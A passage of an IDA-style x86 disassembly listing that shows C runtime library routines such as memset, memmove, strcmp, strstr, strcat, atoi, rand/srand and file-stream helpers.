loc_4171C8: ; CODE XREF: sub_41714B+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_4171D5
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_4171D5: ; CODE XREF: sub_41714B+82�j
cmp edi, eax
jnz short loc_4171DE
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_4171DE: ; CODE XREF: sub_41714B+8C�j
mov eax, edi
pop edi
leave
retn
sub_41714B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4171E3 proc near ; CODE XREF: sub_4170B5+59�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
xor ebx, ebx
loc_4171FF: ; CODE XREF: sub_4171E3+3A�j
cmp [eax], bl
jz short loc_41721F
mov cl, [ecx]
cmp cl, 3Fh
jz short loc_417214
cmp cl, 2Ah
jnz short loc_41721F
cmp cl, 3Fh
jnz short loc_417217
loc_417214: ; CODE XREF: sub_4171E3+25�j
inc eax
mov [edi], eax
loc_417217: ; CODE XREF: sub_4171E3+2F�j
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
jmp short loc_4171FF
; ---------------------------------------------------------------------------
loc_41721F: ; CODE XREF: sub_4171E3+1E�j
; sub_4171E3+2A�j ...
mov eax, [esi]
cmp byte ptr [eax], 2Ah
jnz short loc_41722A
inc dword ptr [esi]
jmp short loc_41721F
; ---------------------------------------------------------------------------
loc_41722A: ; CODE XREF: sub_4171E3+41�j
mov eax, [edi]
mov cl, [eax]
cmp cl, bl
jnz short loc_41724B
mov edx, [esi]
cmp [edx], bl
jz short loc_41723C
xor eax, eax
jmp short loc_4172AB
; ---------------------------------------------------------------------------
loc_41723C: ; CODE XREF: sub_4171E3+53�j
cmp cl, bl
jnz short loc_41724B
mov ecx, [esi]
cmp [ecx], bl
jnz short loc_41724B
push 1
pop eax
jmp short loc_4172AB
; ---------------------------------------------------------------------------
loc_41724B: ; CODE XREF: sub_4171E3+4D�j
; sub_4171E3+5B�j ...
push eax
push dword ptr [esi]
call sub_4170B5
pop ecx
test eax, eax
pop ecx
jnz short loc_417295
loc_417259: ; CODE XREF: sub_4171E3+B0�j
inc dword ptr [edi]
mov eax, [edi]
loc_41725D: ; CODE XREF: sub_4171E3+90�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jz short loc_417275
cmp cl, 5Bh
jz short loc_417275
cmp dl, bl
jz short loc_417275
inc eax
mov [edi], eax
jmp short loc_41725D
; ---------------------------------------------------------------------------
loc_417275: ; CODE XREF: sub_4171E3+82�j
; sub_4171E3+87�j ...
mov eax, [edi]
cmp [eax], bl
jz short loc_41728C
push eax
push dword ptr [esi]
call sub_4170B5
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_417291
; ---------------------------------------------------------------------------
loc_41728C: ; CODE XREF: sub_4171E3+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_417291: ; CODE XREF: sub_4171E3+A7�j
cmp eax, ebx
jnz short loc_417259
loc_417295: ; CODE XREF: sub_4171E3+74�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_4172A8
mov eax, [esi]
cmp [eax], bl
jnz short loc_4172A8
mov [ebp+var_4], 1
loc_4172A8: ; CODE XREF: sub_4171E3+B6�j
; sub_4171E3+BC�j
mov eax, [ebp+var_4]
loc_4172AB: ; CODE XREF: sub_4171E3+57�j
; sub_4171E3+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_4171E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4172B0 proc near ; CODE XREF: sub_401000+64�p
; sub_4010B5+308�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
mov [ebp+var_14], 42h
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
mov [ebp+var_1C], 7FFFFFFFh
push eax
call sub_419E38
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_4172F0
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_4172FD
; ---------------------------------------------------------------------------
loc_4172F0: ; CODE XREF: sub_4172B0+36�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_419D23
pop ecx
pop ecx
loc_4172FD: ; CODE XREF: sub_4172B0+3E�j
mov eax, esi
pop esi
leave
retn
sub_4172B0 endp
; =============== S U B R O U T I N E =======================================
sub_417302 proc near ; CODE XREF: sub_401000+2E�p
; sub_401D82+46�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_433C20, eax
retn
sub_417302 endp
; =============== S U B R O U T I N E =======================================
sub_41730C proc near ; CODE XREF: sub_4010B5+CB�p
; sub_4010B5+13F�p ...
mov eax, ds:dword_433C20
imul eax, 343FDh
add eax, 269EC3h
mov ds:dword_433C20, eax
sar eax, 10h
and eax, 7FFFh
retn
sub_41730C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417330 proc near ; CODE XREF: sub_4010B5+281�p
; sub_40144A+180�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_417383
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_417377
neg ecx
and ecx, 3
jz short loc_417359
sub edx, ecx
loc_417353: ; CODE XREF: sub_417330+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_417353
loc_417359: ; CODE XREF: sub_417330+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_417377
rep stosd
test edx, edx
jz short loc_41737D
loc_417377: ; CODE XREF: sub_417330+18�j
; sub_417330+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_417377
loc_41737D: ; CODE XREF: sub_417330+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_417383: ; CODE XREF: sub_417330+A�j
mov eax, [esp+arg_0]
retn
sub_417330 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417390 proc near ; CODE XREF: sub_4010B5+22D�p
; sub_4010B5+23E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_39 = byte ptr 41h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4173B0
cmp edi, eax
jb loc_417528
loc_4173B0: ; CODE XREF: sub_417390+16�j
test edi, 3
jnz short loc_4173CC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4173EC
rep movsd
jmp off_4174D8[edx*4]
; ---------------------------------------------------------------------------
loc_4173CC: ; CODE XREF: sub_417390+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4173E4
and eax, 3
add ecx, eax
jmp dword ptr loc_4173EC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4173E4: ; CODE XREF: sub_417390+46�j
jmp dword ptr loc_4174E8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4173EC: ; CODE XREF: sub_417390+31�j
; sub_417390+8E�j ...
jmp off_41746C[ecx*4]
; ---------------------------------------------------------------------------
db 90h
dd offset loc_417400
dd offset loc_41742C
dd offset loc_417450
; ---------------------------------------------------------------------------
loc_417400: ; DATA XREF: sub_417390+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4173EC
rep movsd
jmp off_4174D8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41742C: ; DATA XREF: sub_417390+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4173EC
rep movsd
jmp off_4174D8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_417450: ; DATA XREF: sub_417390+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4173EC
rep movsd
jmp off_4174D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41746C dd offset loc_4174CF ; DATA XREF: sub_417390:loc_4173EC�r
dd offset loc_4174BC
dd offset loc_4174B4
dd offset loc_4174AC
dd offset loc_4174A4
dd offset loc_41749C
dd offset loc_417494
dd offset loc_41748C
; ---------------------------------------------------------------------------
loc_41748C: ; CODE XREF: sub_417390:loc_4173EC�j
; DATA XREF: sub_417390+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_417494: ; CODE XREF: sub_417390:loc_4173EC�j
; DATA XREF: sub_417390+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41749C: ; CODE XREF: sub_417390:loc_4173EC�j
; DATA XREF: sub_417390+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4174A4: ; CODE XREF: sub_417390:loc_4173EC�j
; DATA XREF: sub_417390+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4174AC: ; CODE XREF: sub_417390:loc_4173EC�j
; DATA XREF: sub_417390+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4174B4: ; CODE XREF: sub_417390:loc_4173EC�j
; DATA XREF: sub_417390+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4174BC: ; CODE XREF: sub_417390:loc_4173EC�j
; DATA XREF: sub_417390+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4174CF: ; CODE XREF: sub_417390:loc_4173EC�j
; DATA XREF: sub_417390:off_41746C�o
jmp off_4174D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4174D8 dd offset loc_4174E8 ; DATA XREF: sub_417390+35�r
; sub_417390+92�r ...
dd offset loc_4174F0
dd offset loc_4174FC
dd offset loc_417510
; ---------------------------------------------------------------------------
loc_4174E8: ; CODE XREF: sub_417390+35�j
; sub_417390+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4174F0: ; CODE XREF: sub_417390+35�j
; sub_417390+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4174FC: ; CODE XREF: sub_417390+35�j
; sub_417390+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_417510: ; CODE XREF: sub_417390+35�j
; sub_417390+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417528: ; CODE XREF: sub_417390+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41755C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_417550
std
rep movsd
cld
jmp off_417670[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_417550: ; CODE XREF: sub_417390+1B1�j
; sub_417390+208�j ...
neg ecx
jmp off_417620[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41755C: ; CODE XREF: sub_417390+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_417574
and eax, 3
sub ecx, eax
jmp dword ptr loc_417574+4[eax*4]
; ---------------------------------------------------------------------------
loc_417574: ; CODE XREF: sub_417390+1D6�j
; DATA XREF: sub_417390+1DD�r
jmp off_417670[ecx*4]
; ---------------------------------------------------------------------------
align 4
mov [ebp+arg_39], dh
add [eax-2FFFBE8Bh], ch
jnz short loc_4175C8
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_417550
std
rep movsd
cld
jmp off_417670[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_417550
std
rep movsd
cld
loc_4175C8: ; CODE XREF: sub_417390+1F5�j
jmp off_417670[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_417550
std
rep movsd
cld
jmp off_417670[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_417624
dd offset loc_41762C
dd offset loc_417634
dd offset loc_41763C
dd offset loc_417644
dd offset loc_41764C
dd offset loc_417654
off_417620 dd offset loc_417667 ; DATA XREF: sub_417390+1C2�r
; ---------------------------------------------------------------------------
loc_417624: ; DATA XREF: sub_417390+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41762C: ; DATA XREF: sub_417390+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_417634: ; DATA XREF: sub_417390+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41763C: ; DATA XREF: sub_417390+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_417644: ; DATA XREF: sub_417390+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41764C: ; DATA XREF: sub_417390+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_417654: ; DATA XREF: sub_417390+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_417667: ; CODE XREF: sub_417390+1C2�j
; DATA XREF: sub_417390:off_417620�o
jmp off_417670[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_417670 dd offset loc_417680 ; DATA XREF: sub_417390+1B7�r
; sub_417390:loc_417574�r ...
dd offset loc_417688
dd offset loc_417698
dd offset loc_4176AC
; ---------------------------------------------------------------------------
loc_417680: ; CODE XREF: sub_417390+1B7�j
; sub_417390:loc_417574�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417688: ; CODE XREF: sub_417390+1B7�j
; sub_417390:loc_417574�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417698: ; CODE XREF: sub_417390+1B7�j
; sub_417390:loc_417574�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4176AC: ; CODE XREF: sub_417390+1B7�j
; sub_417390:loc_417574�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_417390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4176D0 proc near ; CODE XREF: sub_4010B5+FC�p
; sub_4010B5+118�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_41771C
loc_4176E0: ; CODE XREF: sub_4176D0+3C�j
; sub_4176D0+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_417714
or al, al
jz short loc_417710
cmp ah, [ecx+1]
jnz short loc_417714
or ah, ah
jz short loc_417710
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_417714
or al, al
jz short loc_417710
cmp ah, [ecx+3]
jnz short loc_417714
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_4176E0
mov edi, edi
loc_417710: ; CODE XREF: sub_4176D0+18�j
; sub_4176D0+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_417714: ; CODE XREF: sub_4176D0+14�j
; sub_4176D0+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41771C: ; CODE XREF: sub_4176D0+E�j
test edx, 1
jz short loc_417738
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_417714
inc ecx
or al, al
jz short loc_417710
test edx, 2
jz short loc_4176E0
loc_417738: ; CODE XREF: sub_4176D0+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_417714
or al, al
jz short loc_417710
cmp ah, [ecx+1]
jnz short loc_417714
or ah, ah
jz short loc_417710
add ecx, 2
jmp short loc_4176E0
sub_4176D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417760 proc near ; CODE XREF: sub_4010B5+19E�p
; sub_401A76+11B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_417779
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_417779: ; CODE XREF: sub_417760+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_417760 endp
; =============== S U B R O U T I N E =======================================
sub_417794 proc near ; CODE XREF: sub_41781F+4�p
; sub_42094E+1A2�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_41779C: ; CODE XREF: sub_417794+34�j
cmp ds:dword_433E7C, 1
jle short loc_4177B4
movzx eax, byte ptr [edi]
push 8
push eax
call sub_41A642
pop ecx
pop ecx
jmp short loc_4177C3
; ---------------------------------------------------------------------------
loc_4177B4: ; CODE XREF: sub_417794+F�j
movzx eax, byte ptr [edi]
mov ecx, ds:off_433C70
mov al, [ecx+eax*2]
and eax, 8
loc_4177C3: ; CODE XREF: sub_417794+1E�j
test eax, eax
jz short loc_4177CA
inc edi
jmp short loc_41779C
; ---------------------------------------------------------------------------
loc_4177CA: ; CODE XREF: sub_417794+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_4177DA
cmp esi, 2Bh
jnz short loc_4177DE
loc_4177DA: ; CODE XREF: sub_417794+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_4177DE: ; CODE XREF: sub_417794+44�j
xor ebx, ebx
loc_4177E0: ; CODE XREF: sub_417794+7B�j
cmp ds:dword_433E7C, 1
jle short loc_4177F5
push 4
push esi
call sub_41A642
pop ecx
pop ecx
jmp short loc_417800
; ---------------------------------------------------------------------------
loc_4177F5: ; CODE XREF: sub_417794+53�j
mov eax, ds:off_433C70
mov al, [eax+esi*2]
and eax, 4
loc_417800: ; CODE XREF: sub_417794+5F�j
test eax, eax
jz short loc_417811
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_4177E0
; ---------------------------------------------------------------------------
loc_417811: ; CODE XREF: sub_417794+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_41781A
neg eax
loc_41781A: ; CODE XREF: sub_417794+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_417794 endp
; =============== S U B R O U T I N E =======================================
sub_41781F proc near ; CODE XREF: sub_4013EC+12�p
; sub_4013EC+1D�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_417794
pop ecx
retn
sub_41781F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41782A proc near ; CODE XREF: sub_40144A+318�p
; sub_401D82+460�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_14], 42h
mov [ebp+var_1C], eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_8]
push eax
call sub_419E38
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_417869
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_417876
; ---------------------------------------------------------------------------
loc_417869: ; CODE XREF: sub_41782A+35�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_419D23
pop ecx
pop ecx
loc_417876: ; CODE XREF: sub_41782A+3D�j
mov eax, esi
pop esi
leave
retn
sub_41782A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417880 proc near ; CODE XREF: sub_401D82+2D8�p
; sub_401D82+2F8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_4178FA
mov dh, [ecx+1]
test dh, dh
jz short loc_4178E7
loc_417898: ; CODE XREF: sub_417880+52�j
; sub_417880+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_4178BA
test al, al
jz short loc_4178B4
loc_4178A9: ; CODE XREF: sub_417880+32�j
mov al, [esi]
inc esi
loc_4178AC: ; CODE XREF: sub_417880+3F�j
cmp al, dl
jz short loc_4178BA
test al, al
jnz short loc_4178A9
loc_4178B4: ; CODE XREF: sub_417880+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4178BA: ; CODE XREF: sub_417880+23�j
; sub_417880+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_4178AC
lea edi, [esi-1]
loc_4178C4: ; CODE XREF: sub_417880+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_4178F3
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_417898
mov al, [ecx+3]
test al, al
jz short loc_4178F3
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_4178C4
jmp short loc_417898
; ---------------------------------------------------------------------------
loc_4178E7: ; CODE XREF: sub_417880+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_418F56
; ---------------------------------------------------------------------------
loc_4178F3: ; CODE XREF: sub_417880+49�j
; sub_417880+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_4178FA: ; CODE XREF: sub_417880+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_417880 endp
; =============== S U B R O U T I N E =======================================
sub_417900 proc near ; CODE XREF: sub_4022C6+94�p
; sub_405A58+7C�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
mov eax, [esi+0Ch]
test al, 40h
jz short loc_417915
or eax, 0FFFFFFFFh
jmp short loc_41794F
; ---------------------------------------------------------------------------
loc_417915: ; CODE XREF: sub_417900+E�j
test al, 83h
jz short loc_41794D
push esi
call sub_41A7D0
push esi
mov edi, eax
call sub_41A76A
push dword ptr [esi+10h]
call sub_41A6B7
add esp, 0Ch
test eax, eax
jge short loc_41793B
or edi, 0FFFFFFFFh
jmp short loc_41794D
; ---------------------------------------------------------------------------
loc_41793B: ; CODE XREF: sub_417900+34�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_41794D
push eax
call sub_417C3B
and dword ptr [esi+1Ch], 0
pop ecx
loc_41794D: ; CODE XREF: sub_417900+17�j
; sub_417900+39�j ...
mov eax, edi
loc_41794F: ; CODE XREF: sub_417900+13�j
and dword ptr [esi+0Ch], 0
pop edi
pop esi
retn
sub_417900 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417956 proc near ; CODE XREF: sub_4022C6+8E�p
; sub_40EE72+2B0F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call sub_41A8A2
mov esi, eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419E38
push [ebp+arg_0]
mov edi, eax
push esi
call sub_41A92F
add esp, 18h
mov eax, edi
pop edi
pop esi
pop ebp
retn
sub_417956 endp
; =============== S U B R O U T I N E =======================================
sub_417988 proc near ; CODE XREF: sub_4179A8+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_41AADC
test eax, eax
jnz short loc_417992
retn
; ---------------------------------------------------------------------------
loc_417992: ; CODE XREF: sub_417988+7�j
push eax
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41A96C
add esp, 10h
retn
sub_417988 endp
; =============== S U B R O U T I N E =======================================
sub_4179A8 proc near ; CODE XREF: sub_4022C6+54�p
; sub_405A58+2A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_417988
add esp, 0Ch
retn
sub_4179A8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4179C0 proc near ; CODE XREF: sub_405AF2+2BF�p
; sub_40A7D7+75�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_417A31
sub_4179C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4179D0 proc near ; CODE XREF: sub_4022C6+32�p
; sub_4022C6+43�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_4179EC
loc_4179DD: ; CODE XREF: sub_4179D0+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_417A1F
test ecx, 3
jnz short loc_4179DD
loc_4179EC: ; CODE XREF: sub_4179D0+B�j
; sub_4179D0+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_4179EC
mov eax, [ecx-4]
test al, al
jz short loc_417A2E
test ah, ah
jz short loc_417A29
test eax, 0FF0000h
jz short loc_417A24
test eax, 0FF000000h
jz short loc_417A1F
jmp short loc_4179EC
; ---------------------------------------------------------------------------
loc_417A1F: ; CODE XREF: sub_4179D0+12�j
; sub_4179D0+4B�j
lea edi, [ecx-1]
jmp short loc_417A31
; ---------------------------------------------------------------------------
loc_417A24: ; CODE XREF: sub_4179D0+44�j
lea edi, [ecx-2]
jmp short loc_417A31
; ---------------------------------------------------------------------------
loc_417A29: ; CODE XREF: sub_4179D0+3D�j
lea edi, [ecx-3]
jmp short loc_417A31
; ---------------------------------------------------------------------------
loc_417A2E: ; CODE XREF: sub_4179D0+39�j
lea edi, [ecx-4]
loc_417A31: ; CODE XREF: sub_4179C0+5�j
; sub_4179D0+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_417A56
loc_417A3D: ; CODE XREF: sub_4179D0+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_417AA8
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_417A3D
jmp short loc_417A56
; ---------------------------------------------------------------------------
loc_417A51: ; CODE XREF: sub_4179D0+9E�j
; sub_4179D0+B8�j
mov [edi], edx
add edi, 4
loc_417A56: ; CODE XREF: sub_4179D0+6B�j
; sub_4179D0+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_417A51
test dl, dl
jz short loc_417AA8
test dh, dh
jz short loc_417A9F
test edx, 0FF0000h
jz short loc_417A92
test edx, 0FF000000h
jz short loc_417A8A
jmp short loc_417A51
; ---------------------------------------------------------------------------
loc_417A8A: ; CODE XREF: sub_4179D0+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_417A92: ; CODE XREF: sub_4179D0+AE�j
mov [edi], dx
